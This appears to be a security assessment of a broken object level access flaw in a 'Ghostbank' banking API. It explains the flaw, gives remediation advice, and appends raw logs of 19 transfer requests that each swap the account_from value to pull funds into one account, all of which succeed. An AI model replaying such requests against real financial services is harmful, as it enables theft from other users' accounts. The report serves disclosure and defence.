Assessment Report: BOLA Attack on Ghostbank API

Executive Summary

In October 2024 from 22:08:33 to 22:08:37, a series of automated requests were launched against the Ghostbank API, demonstrating a Broken Object Level Access (BOLA) vulnerability. BOLA flaws allow unauthorized access to resources based on user-controlled input. This attack permitted the unauthorized transfer of funds between accounts without necessary authorization checks, leading to potential financial losses and reputational damage for the organization. The attack employed simple HTTP POST requests targeting the /api/v3/transfer endpoint, successfully executing transactions by manipulating the account_from parameter.

Explanation of BOLA Attacks

A Broken Object Level Access (BOLA) vulnerability occurs when an application allows an attacker to access or modify objects without proper authorization, generally due to missing or ineffective access controls. The lack of authorization checks on user input permits attackers to manipulate sensitive data and access resources that should be restricted. BOLA vulnerabilities typically manifest in functionalities that rely on object identifiers, such as account numbers, user IDs, or document IDs. In this case, the Ghostbank API lacked verification to ensure that the user making the request was authorized to access the accounts involved.

Detailed Explanation

During the attack, the following patterns were observed in the 20 requests made against the Ghostbank API:

  1. HTTP POST Requests: Each request utilized the HTTP POST method, indicating intent to perform actions that change state on the server (in this case, transferring funds).

  2. Endpoint Targeted: All requests were directed at the /api/v3/transfer endpoint, with the same common structure and headers. The User-Agent header was consistently the same, suggesting the use of automated tools for the attack.

  3. Manipulated Parameters: The crucial part of each request was the account_from parameter that was manipulated to different account numbers, seemingly repeated to verify access to accounts that did not belong to the authenticated user. The account_to parameter remained constant, indicating funds were redirected to a single account.

  4. Successful Transactions: All requests received a successful HTTP 200 OK response with a JSON payload confirming the transaction. The consistent success status demonstrates a lack of verification of access rights for the specified accounts, leading to unauthorized transactions.

Given the successful execution of these requests, the BOLA vulnerability allows legitimate users to exploit their access as a means to interact with accounts that do not belong to them, significantly affecting the security and integrity of user accounts and the overall application.

Remediation Guidance

To address and mitigate the assessed vulnerabilities, the following actions are recommended:

Code and Logic Improvements:

  1. Implement Access Control Checks: Ensure that all sensitive operations, particularly those affecting user account balances, have strong authorization logic. Validate that the active user is authorized to perform actions on the resource identified by account_from.

  2. Use Object-Level Security Policies: Enforce policies that regulate which users can access which resources based on their roles. Consider implementing Role-Based Access Control (RBAC) or Attribute-Based Access Control (ABAC) methodologies to define clearer permissions.

  3. Input Validation: Always validate user input in controller logic to ensure it corresponds with established user permissions. Ensure that parameters correspond to the user's assigned resources and not allow arbitrary access based on user input.

  4. Audit Logs: Implement logging of all transactional requests, including the user ID executing the request, to enhance traceability and accountability for unauthorized actions.

Web Application Firewall (WAF) Measures:

  1. Rate Limiting: Configure rate-limiting rules to restrict the number of requests an individual user can make over a given timeframe, preventing automated attacks.

  2. Payload Inspection: Deploy context-aware security rules that inspect incoming traffic for suspicious patterns indicating parameter manipulation or unauthorized access attempts.

  3. Blocking Known User-Agent Strings: If identified as part of an attack methodology, consider temporarily blocking requests from specific user-agent strings often employed by attackers.

These measures should significantly reduce the risk of BOLA vulnerabilities and enhance the security posture of the Ghostbank API, better protecting user accounts and financial transactions.

Appendix

The Request/Response Listing:

# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 149, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0ae39176c22-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:33 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3D8ASU5y%2Bg2IdFR42Uthsl0n5h%2BtckhwIHxaUyDiapFlPKWIutW9v72GaJ%2FZ6mYFqlZnHXbl4hX%2BLR%2FNcU2r98kZqyFjLaSU3Lbcq44zcO%2BHKxW4zjgJmnsev7hUZg9ZUeGWCg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=16779&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=251869&cwnd=222&unsent_bytes=0&cid=71b34178489f24ef&ts=84&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 253, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b26fca475a-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:33 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xc4ASxa0gHBAFGSK1Ox3P2%2BWXivt7JDhiO%2BMY19OnTNseoLIOHF9pzg8NeMvI7kXeiDIa1G%2B4o5eY8rvDQ1swvYO0mbTtMf7dNlbJUmvya38ukBBpMSDhwBWuzKZFI5Tt7%2Fa0w%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17162&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=249054&cwnd=248&unsent_bytes=0&cid=65455a1e8ee10e0c&ts=122&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 279, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b348324784-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:33 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JU5HEafiqj809pRQf2Zc%2BnPKz7Olv6ssfIfi7G3YqTuuxlRRAuaecatVvW3noDmn8seGJxxR1%2BO1P2r5ZFJHcYlsZ3JAjxIciM%2B4BVomBRcHnZ4Ktt7CY%2BDyenwvk8qgvqZGtA%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17496&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=216485&cwnd=249&unsent_bytes=0&cid=27d6f9ecb67de55e&ts=117&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 298, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b3f9c80b71-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBo7I%2BBcHrGgD5mj0zX04Ob9shSwvsoxs%2FJH7qCye0gCSuLiU%2BK1QoJd5Y6v3irjli7z44WM4gT4uqdHaNvaUVhPHNOSqyn9dkWzx8QcIQYIWjqiwSuqlS23ScHNCtYNgtV%2BvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=16284&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=256752&cwnd=251&unsent_bytes=0&cid=05d2602371cf6b5c&ts=117&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 283, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b37ee8ddaf-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJ2RnYRta%2BZs%2B%2BVL01pKRhdez1LnjWrfwH9HIz7kq2iABmSdoKO7NYES9o23WjUo6D7IwHP36FKRGTcdoQaZhxMabDIfBf1%2BsJZI9P1bONd4SUvzfIgFm%2BQqj6G6lt8wvh3k%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=20446&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3104&recv_bytes=1071&delivery_rate=255289&cwnd=103&unsent_bytes=0&cid=cc141608db6a6fde&ts=231&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 345, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b5ce586b04-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTSltakr3CwpW5VjFBeiOGxvmBxe0QdMn7StfQ2LxYpMByi8fpFGjVMNjCbldEsYGLS%2BnGCXqdgcWKc5jjQdZdiTf9GrOtzyB0Ov4h5VZVqCNQzbTEka4yw9Hzt7wzKp4tVjtA%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=18882&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3104&recv_bytes=1071&delivery_rate=226899&cwnd=235&unsent_bytes=0&cid=2f466209c9598e81&ts=133&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 395, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b7dc172d3e-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FIga8khcj8AuJZIZfG4958kBistu4d%2FoslQw%2FTi9Wyx%2BvBCHXmBhOkZol1eh1kw7lfvwFx%2FsUFLJYwiV%2BxNocsm%2FRi%2FTumzm4NGintx3TJAYl9tf3KSvXv42Anr9AIVKJFYDg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=18631&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=197087&cwnd=235&unsent_bytes=0&cid=26947a978158564e&ts=103&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 406, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b88b994793-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAbqOM%2FGHz2tz1XGFxDmi%2F2ymZGaWuYIiVRtuCzwOiEjXsfhXa%2FqHFzIUcfuv3CHRmfyCyVVT%2BeaWbFBwuhZQZkDJ7ltvhAnJKr%2FJnN74AYgRrHuHNnixBM7v2Y9zS8SpaVomQ%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17927&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=243757&cwnd=235&unsent_bytes=0&cid=96b8964a1751b0d4&ts=100&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 412, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0b8ac43a916-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:34 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXwFZxbIxoJk51F%2BUKj%2B8vh9eIEBZFHp1wQMEVKKgLLuMEjdoigC%2F83b%2FrSVbhSKYPA19BHqSsxW2El5osBcPCTNXkBDRQszVRTgt6ZT3zSNW07wItGDM1O5mDU382B3AYE0aw%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=18145&sent=5&recv=8&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=216712&cwnd=236&unsent_bytes=0&cid=4a62d373014df7f3&ts=85&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 548, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0be0dd22cd4-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:35 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MA3BFs21ImqM8stqeOJuEgTJG7v%2BpYk7%2BRl9s2AfRmE42xpCsBGpAw4%2F8bhBnjkqqylt0zXUdj9aDDexjWP5QIZRlmsLfJtXWeLsi%2B9sf%2BSXE%2Fzs%2BxaOUGzOjpkiMyQSlVIN3g%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=18644&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=181430&cwnd=220&unsent_bytes=0&cid=d81f85896fa99009&ts=89&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 593, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0bfbfd06b23-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:35 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8ZoCbzR4yRnjA03j4WdCHby2PmNIW%2BerkarYxgsQEIGSkJH6GrwY7NqQDfkeiEpr9mvwHLS6K%2FM3X%2Balb57kdq92wS2AWE3hxWg2Jd6bPmL4pGC6mEBCUMbU3bBV6BXMETXsw%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17649&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=237584&cwnd=251&unsent_bytes=0&cid=20a7495404e91ed4&ts=95&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 585, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0bfaea0460c-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:35 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1x7Rdo%2FFX2qFCBMCtQEgMdFER6F35sIQX9NuIJSzj4wwhMo8pwxTXovq7M2ynGtYMrTi1hK6i%2BJFcfRPti6r8D%2BBwQYN277XCUvclllvNRtqB2%2B52QjQQpNWV9U%2FJZs8iCgRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=15829&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=269646&cwnd=237&unsent_bytes=0&cid=33d3ff30bba173a7&ts=107&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 620, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c0aaedea84-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:36 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P2xk2kdTQbX%2Fl0ZuuSrpuS0F99zjSb1dRjKtml%2Bv5ZD4nf7ExuPl7V9RFs1VWD3mvz2xDseQ0QJF2fMiOHIoHcv%2BbC%2BuaxU1sozgl%2BBnXafpam983%2F6v9ybDJ5qoDV%2BFkZiedg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=19188&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=239365&cwnd=191&unsent_bytes=0&cid=c85a341d3f100d54&ts=94&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 633, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c13d716c16-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:36 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tqzmiy5XgYyMeURlQgkUzpk8qdmp9%2BbhJM%2FXGrPbB3wv%2Byddt82g8hpv4UBoHz8PL%2Bfpz2t%2BCmHNnqLBe7kZ1aPLB72CCKYwBw4LAqe%2BwG9LyA%2BaoIRtqcrvWTO9mfgJsgX%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17846&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=213979&cwnd=230&unsent_bytes=0&cid=1dfc9f410babbfeb&ts=97&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 677, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c2ba8a2c9a-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:36 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FkiG2Itu3T08G8%2BFr6cWg%2FQXNBH2vND%2FC4hv4om6iMV0VjLDwm89MlLStAYRImeIoczZjH1fXZQH7pGjAfQkm%2FOSkj2tCYOLFWMDjg090KsTpxheQS0Q0%2F89c3%2BqBtB24oLng%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=16951&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3105&recv_bytes=1071&delivery_rate=239589&cwnd=216&unsent_bytes=0&cid=72d46b57c73b29ca&ts=91&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 697, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c45ec3e75a-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:36 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jutTrUis4MC9Zs%2BFNMGVcF2GFHfrLCY1d77sqZw39d4bSIAkCEd797cCn7UVvh9iDZUHxmsKp7TeEsewWHrg66uAkJzCoSrl8dFCGQx9AuUcKhMveaEpuNNeHZApHq96zv5Eig%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=19650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3104&recv_bytes=1071&delivery_rate=168535&cwnd=233&unsent_bytes=0&cid=ee6f88c3e7a740aa&ts=98&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 775, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c70ca92c93-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:37 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fON3rB8irqGIcIfFSHRpmRrd%2FPYK9s%2FLGDT%2FIjWwBevlAkdxDjbuUtDamsqK0n0Hw9UZrp1Ml7oj%2BzJ5nRD8qbdrVMgjDdpR7C0pjwoI7dqYgKmltG9vTCoT3y1EmqohVobsQg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=17465&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=220619&cwnd=227&unsent_bytes=0&cid=eb61b6dd7a52aff5&ts=92&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 786, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c799616b49-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:37 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ef4%2BXcI3i8YjZ4q2DGIVBYAKTJddRKid7M61jG4CYB9LcSONGADYrKzm%2BB673V%2FjUQe8OkdqSQjqF8CXPzYPDTxqK%2FNEAiQS1jZwILNH3ek0xlOLwETBNcnJTjmoOvloxr2Lgg%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=16779&sent=5&recv=8&lost=0&retrans=0&sent_bytes=3106&recv_bytes=1071&delivery_rate=250576&cwnd=231&unsent_bytes=0&cid=0ff66707ec396326&ts=78&x=0"
Vary: Accept-Encoding

{"status":"ok"


# Request
POST /api/v3/transfer HTTP/1.1
Host: api.ghostbank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Content-Length: 53
Accept: */*
Cookie: ghostbank=<redacted cookie>
Accept-Encoding: gzip

{"account_from": 794, "account_to": 715, "amount": 2} 
# Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 8d65f0c7d84ce5a5-DFW
Content-Type: application/json; charset=utf-8
Date: Tue, 22 Oct 2024 02:08:37 GMT
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3jGJn8D2C7PBYJtTECSjZKGs6WdSFntanFdlcPTFXC4eovPRnzZlx84KYNGQFLrR1wCx8aNRw9Qy0w1KxZoTSkQKTpHif6veDQsYAbzyWaR31FBtuholl51YsyCHgtSpx%2FgmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
Server: cloudflare
Server-Timing: cfL4;desc="?proto=TCP&rtt=22096&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3104&recv_bytes=1071&delivery_rate=244374&cwnd=235&unsent_bytes=0&cid=f479922876b05f0f&ts=82&x=0"
Vary: Accept-Encoding

{"status":"ok"